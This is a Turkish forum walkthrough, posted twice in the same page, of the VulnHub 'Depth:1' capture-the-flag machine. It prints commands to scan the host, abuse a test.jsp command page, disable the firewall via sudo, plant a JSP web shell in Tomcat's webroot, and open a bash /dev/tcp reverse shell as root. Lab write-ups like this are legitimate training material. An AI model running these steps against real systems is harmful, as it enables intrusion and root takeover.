- 9 Tem 2009
- 1,036
- 18
Bu konumda sizlere Depth 1 açıklı makinenin çözümünü anlatacam.Bu makinemizde hedefimiz root flag (bayrak) olacaktir.Sistemde birtane flag (bayrak) var onu bulmamız isteniyor.
Depth:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:
https://www.vulnhub.com/entry/depth-1,213/
netdiscover komutu bize modeme bağlı cihazları listeliyor. Oradan ipyi kopyalıyoruz.
Bu komut ile portlara bakıyoruz. 8080 portunu gösteriyor bize tarayıcımıza ipadresi ve port numarası olarak yazıyoruz.
Karşımıza web sayfası çıktı. Web sayfasında lokal dosya yolunu vermektedir orayı not alıyoruz.
Nikto ile hedef sistemdeki açıklara bakıyoruz. Çıkan sonuçtan test.jsp uzantısını not alıyoruz.
ipadresiort/test.jsp olacak şekilde tarayıcımıza yazıyoruz.Açılan sayfadaki örnek komutu yazdığımda /tmp dizinindeki dosyalarını ekrana yansıttı.
Araştırmaya devam ettiğimde bill kullanıcısına ulaştım. Bill kullanıcısının bir ssh dizinine ve sudo_as_admin_successfull adlı bir dosyaya sahip olduğunu görüyorum, portları tararken 22 ssh portunu bulamadım.Bu demek oluyor ki güvenlik duvarı aktif durumda onu kapatmamız gerekli.
Bu komut ile güvenlik duvarını kapatıyoruz.
Bu kısıma birazdan shelimizi yükleyeceğiz.
Yukardaki komutları yazıp jsp shelli yüklüyoruz.
Yukardaki komutları yazıyoruz ve shelimize bağlanıyoruz.
Bayrağı bulduk bir konun daha sonuna geldik.Hata alan olur ise resimli olarak hatayı iletirse yardımcı olurum.
Depth:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:
https://www.vulnhub.com/entry/depth-1,213/
netdiscover komutu bize modeme bağlı cihazları listeliyor. Oradan ipyi kopyalıyoruz.
Kod:
nmap ipadresi
Bu komut ile portlara bakıyoruz. 8080 portunu gösteriyor bize tarayıcımıza ipadresi ve port numarası olarak yazıyoruz.
Karşımıza web sayfası çıktı. Web sayfasında lokal dosya yolunu vermektedir orayı not alıyoruz.
Kod:
nikto -h http: ipadresi: port
Nikto ile hedef sistemdeki açıklara bakıyoruz. Çıkan sonuçtan test.jsp uzantısını not alıyoruz.
ipadresiort/test.jsp olacak şekilde tarayıcımıza yazıyoruz.Açılan sayfadaki örnek komutu yazdığımda /tmp dizinindeki dosyalarını ekrana yansıttı.
Araştırmaya devam ettiğimde bill kullanıcısına ulaştım. Bill kullanıcısının bir ssh dizinine ve sudo_as_admin_successfull adlı bir dosyaya sahip olduğunu görüyorum, portları tararken 22 ssh portunu bulamadım.Bu demek oluyor ki güvenlik duvarı aktif durumda onu kapatmamız gerekli.
Kod:
sudo ssh bill@localhost ufw disable
Bu komut ile güvenlik duvarını kapatıyoruz.
Kod:
ls -all /var/lib/tomcat8/webapps/ROOT/
Bu kısıma birazdan shelimizi yükleyeceğiz.
Kod:
python -m SimpleHTTPServer
Kod:
sh -c $@| sh . echo ssh bill@localhost sudo wget [url]http://localhost:8000/shell.jsp[/url] -o /var/lib/tomcat8/webapps/ROOT/shell.jsp
Yukardaki komutları yazıp jsp shelli yüklüyoruz.
Kod:
nc -lvp 2222
Kod:
ssh bill@localhost sudo bash -i>& /dev/tcp/ipadresi/2222 0>&1
Yukardaki komutları yazıyoruz ve shelimize bağlanıyoruz.
Kod:
cat /root/flag
Bayrağı bulduk bir konun daha sonuna geldik.Hata alan olur ise resimli olarak hatayı iletirse yardımcı olurum.
Son düzenleme: